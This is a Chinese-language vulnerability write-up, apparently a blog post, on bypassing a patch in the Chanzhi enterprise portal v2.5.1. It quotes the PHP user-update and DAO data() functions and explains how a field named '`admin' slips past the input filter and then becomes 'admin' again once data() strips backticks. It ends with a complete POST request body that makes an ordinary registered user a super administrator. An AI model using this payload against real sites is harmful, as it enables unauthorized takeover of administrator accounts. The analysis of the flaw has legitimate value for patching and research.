蝉知企业门户系统 v2.5.1 绕过补丁继续注入 – 网站

/system/module/user/model.php

public function update($account)

    {

        /* If the user want to change his password. */

        if($this->post->password1 != false)

        {

            $this->checkPassword();

            if(dao::isError()) return false;



            $password  = $this->createPassword($this->post->password1, $account);

            $this->post->set('password', $password);

        }



        $user = fixer::input('post')

            ->cleanInt('imobile, qq, zipcode')

            ->setDefault('admin', 'no')

            ->remove('ip, account, join, visits')

            ->removeIF(RUN_MODE != 'admin', 'admin')

            ->get();



        return $this->dao->update(TABLE_USER)

            ->data($user, $skip = 'password1,password2')

            ->autoCheck()

            ->batchCheck($this->config->user->require->edit, 'notempty')

            ->check('email', 'email')

            ->check('email', 'unique', "account!='$account'")

            ->checkIF($this->post->gtalk != false, 'gtalk', 'email')

            ->where('account')->eq($account)

            ->exec();

    }

fixer这个类对admin字段进行了检测
看到
/system/lib/dao/dao.class.php
的data()

*/
    public function data($data, $skipFields = '')
    {
        $this->data = $data;
        if($skipFields) $skipFields = ',' . str_replace(' ', '', $skipFields) . ',';

        foreach($data as $field => $value)
        {
            $field = str_replace('`', '', $field);
            $field = str_replace(',', '', $field);
            if(strpos($skipFields, ",$field,") !== false) continue;
            $this->sql .= "`$field` = " . $this->quote($value) . ',';
        }
        $this->sql = rtrim($this->sql, ',');    // Remove the last ','.
        return $this;
    }

去掉了 `这个符号

我们提交 `admin绕过检测后 ，再进入data()后去掉 `又被还原，

导致 管理员权限的提升

注册用户修改资料 post

realname=aaaaaa’&email=z%40qq.com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&`admin=super

即可提升至管理员